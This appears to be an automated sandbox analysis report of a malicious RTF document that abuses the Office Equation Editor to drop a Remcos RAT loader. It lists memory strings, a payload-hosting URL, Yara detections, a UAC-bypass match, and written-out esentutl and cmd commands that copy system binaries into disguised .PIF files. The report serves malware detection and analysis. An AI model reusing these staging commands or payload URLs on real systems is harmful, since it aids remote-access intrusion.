                  Source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                  Source: audiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: audiodg.exe, 00000005.00000002.398958656.000000000074C000.00000004.00000001.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: audiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: audiodg.exe, 00000005.00000002.398958656.000000000074C000.00000004.00000001.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: audiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: audiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: audiodg.exe, 00000005.00000002.398958656.000000000074C000.00000004.00000001.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.398958656.0000000000756000.00000004.00000001.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                  Source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                  Source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                  Source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                  Source: audiodg.exe, 00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.400349163.0000000002DA7000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: audiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                  Source: audiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                  Source: audiodg.exe, 00000005.00000002.398958656.000000000074C000.00000004.00000001.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                  Source: audiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                  Source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                  Source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                  Source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                  Source: audiodg.exe, 00000005.00000002.398958656.000000000074C000.00000004.00000001.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                  Source: audiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                  Source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                  Source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                  Source: audiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                  Source: audiodg.exe, 00000005.00000002.398958656.000000000074C000.00000004.00000001.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.398958656.0000000000756000.00000004.00000001.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: audiodg.exe, 00000005.00000002.400314447.0000000002D4E000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402737811.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
                  Source: audiodg.exe, 00000005.00000002.401375610.000000000DB73000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://maan2u.com/doc/233_Qzzgbhhaaml
                  Source: audiodg.exe, 00000005.00000002.398958656.00000000006E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://maan2u.com/doc/233_QzzgbhhaamlKd
                  Source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                  Source: audiodg.exe, 00000005.00000002.398958656.000000000074C000.00000004.00000001.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.393192646.0000000000725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
                  Source: Yara matchFile source: 5.2.audiodg.exe.2d20000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.400349163.0000000002DA7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: audiodg.exe PID: 3780, type: MEMORYSTR

                  E-Banking Fraud

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 5.2.audiodg.exe.2d20000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.400349163.0000000002DA7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: audiodg.exe PID: 3780, type: MEMORYSTR

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: K0hpP6V2fo.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                  Source: 5.2.audiodg.exe.2d20000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 5.2.audiodg.exe.2d20000.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000005.00000002.400349163.0000000002DA7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: audiodg.exe PID: 3780, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Office equation editor drops PE file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\audiodg[1].exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\audiodg.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\esentutl.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\esentutl.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\esentutl.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\SndVol.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\SndVol.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 17_2_02D58730 NtQueueApcThread,17_2_02D58730
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 17_2_02D57A2C NtAllocateVirtualMemory,17_2_02D57A2C
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 17_2_02D5DD70 NtOpenFile,NtReadFile,NtClose,17_2_02D5DD70
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 17_2_02D57D78 NtWriteVirtualMemory,17_2_02D57D78
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 17_2_02D57AC9 NtAllocateVirtualMemory,17_2_02D57AC9
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 17_2_02D57A2A NtAllocateVirtualMemory,17_2_02D57A2A
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 17_2_02D5F7C8 CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,17_2_02D5F7C8
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008E9DF72_2_008E9DF7
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: 17_2_02D420C417_2_02D420C4
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\audiodg[1].exe 7AD64F279E3FA6A7D0EF2916240F1337584C5B5176FB56089771164F2905554F
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\audiodg.exe 7AD64F279E3FA6A7D0EF2916240F1337584C5B5176FB56089771164F2905554F
                  Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\Qzzgbhha.PIF 7AD64F279E3FA6A7D0EF2916240F1337584C5B5176FB56089771164F2905554F
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: String function: 02D44860 appears 683 times
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: String function: 02D446D4 appears 155 times
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: String function: 02D5894C appears 50 times
                  Source: K0hpP6V2fo.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                  Source: 5.2.audiodg.exe.2d20000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 5.2.audiodg.exe.2d20000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000005.00000002.400349163.0000000002DA7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: audiodg.exe PID: 3780, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: classification engineClassification label: mal100.troj.expl.evad.winRTF@19/18@3/2
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$hpP6V2fo.rtfJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR8E79.tmpJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ................................T.h.e. .b.a.t.c.h. .f.i.l.e. .c.a.n.n.o.t. .b.e. .f.o.u.n.d.........W.O.........h.!.....B.......................Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: K0hpP6V2fo.rtfReversingLabs: Detection: 47%
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\audiodg.exe "C:\Users\user\AppData\Roaming\audiodg.exe"
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ahhbgzzQ.cmd" "
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Roaming\audiodg.exe /d C:\\Users\\Public\\Libraries\\Qzzgbhha.PIF /o
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: unknownProcess created: C:\Users\Public\Libraries\Qzzgbhha.PIF "C:\Users\Public\Libraries\Qzzgbhha.PIF"
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\audiodg.exe "C:\Users\user\AppData\Roaming\audiodg.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ahhbgzzQ.cmd" "Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Roaming\audiodg.exe /d C:\\Users\\Public\\Libraries\\Qzzgbhha.PIF /oJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exeJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: olepro32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: url.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: ieframe.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeSection loaded: amsi.dllJump to behavior
